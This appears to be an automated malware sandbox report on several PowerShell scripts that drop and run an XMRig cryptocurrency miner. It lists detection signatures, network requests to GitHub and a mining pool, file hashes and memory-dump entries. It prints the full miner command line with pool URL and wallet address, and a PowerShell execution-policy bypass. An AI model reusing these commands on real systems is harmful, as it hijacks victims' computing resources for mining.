memory/4176-126-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-127-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-128-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-129-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-130-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-131-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-132-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-133-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-134-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-135-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-136-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-137-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-138-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-139-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-140-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-141-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-142-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-143-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-144-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-145-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-146-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-147-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-148-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-149-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-150-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-151-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-152-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-153-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-154-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-155-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-156-0x00007FF718200000-0x00007FF718E33000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:04

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1786s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 8.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp

Files

memory/3968-0-0x00007FF992773000-0x00007FF992774000-memory.dmp

memory/3968-5-0x000002727BFE0000-0x000002727C002000-memory.dmp

memory/3968-9-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3968-8-0x000002727C1B0000-0x000002727C226000-memory.dmp

memory/3968-18-0x00007FF992770000-0x00007FF99315C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_isgkynml.vzf.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3968-25-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3968-48-0x000002727C070000-0x000002727C082000-memory.dmp

memory/3968-61-0x000002727C060000-0x000002727C06A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2576-90-0x00000270465D0000-0x00000270465F0000-memory.dmp

memory/3968-91-0x00007FF992773000-0x00007FF992774000-memory.dmp

memory/3968-92-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/2576-93-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/3968-94-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/2576-95-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-96-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-97-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-98-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-99-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-100-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-101-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-102-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-103-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-104-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-105-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-106-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-107-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-108-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-109-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-110-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-111-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-112-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-113-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-114-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-115-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-116-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-117-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-118-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-119-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-120-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-121-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-122-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-123-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-124-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-125-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-126-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-127-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-128-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-129-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-130-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-131-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-132-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-133-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-134-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-135-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-136-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-137-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-138-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-139-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-140-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-141-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-142-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-143-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-144-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-145-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-146-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-147-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-148-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-149-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-150-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-151-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-152-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-153-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-154-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-155-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-156-0x00007FF617300000-0x00007FF617F33000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:06

Platform

win10v2004-20240426-en

Max time kernel

1798s

Max time network

1793s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.73.42.20.in-addr.arpa udp

Files

memory/1404-0-0x00007FFB9D473000-0x00007FFB9D475000-memory.dmp

memory/1404-6-0x0000026CF8B10000-0x0000026CF8B32000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b0lia2ul.xtv.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1404-11-0x00007FFB9D470000-0x00007FFB9DF31000-memory.dmp

memory/1404-12-0x00007FFB9D470000-0x00007FFB9DF31000-memory.dmp

memory/1404-14-0x00007FFB9D470000-0x00007FFB9DF31000-memory.dmp

memory/1404-15-0x0000026CF8DC0000-0x0000026CF8DD2000-memory.dmp

memory/1404-16-0x0000026CDFC20000-0x0000026CDFC2A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4708-47-0x000002478F980000-0x000002478F9A0000-memory.dmp

memory/4708-48-0x000002478F9C0000-0x000002478F9E0000-memory.dmp

memory/4708-49-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-50-0x000002478F9E0000-0x000002478FA00000-memory.dmp

memory/4708-53-0x000002478FA00000-0x000002478FA20000-memory.dmp

memory/1404-52-0x00007FFB9D473000-0x00007FFB9D475000-memory.dmp

memory/4708-51-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/1404-54-0x00007FFB9D470000-0x00007FFB9DF31000-memory.dmp

memory/1404-55-0x00007FFB9D470000-0x00007FFB9DF31000-memory.dmp

memory/4708-56-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-58-0x000002478F9E0000-0x000002478FA00000-memory.dmp

memory/4708-57-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-59-0x000002478FA00000-0x000002478FA20000-memory.dmp

memory/4708-60-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-61-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-62-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-63-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-64-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-65-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-66-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-67-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-68-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-69-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-70-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-71-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-72-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-73-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-74-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-75-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-76-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-77-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-78-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-79-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-80-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-81-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-82-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-83-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-84-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-85-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-86-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-87-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-88-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-89-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-90-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-91-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-92-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-93-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-94-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-95-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-96-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-97-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-98-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-99-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-100-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-101-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-102-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-103-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-104-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-105-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-106-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-107-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-108-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-109-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-110-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-111-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-112-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-113-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-114-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-115-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-116-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-117-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-118-0x00007FF651260000-0x00007FF651E93000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:26

Platform

win10v2004-20240426-en

Max time kernel

1799s

Max time network

1787s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 52.111.229.43:443 tcp
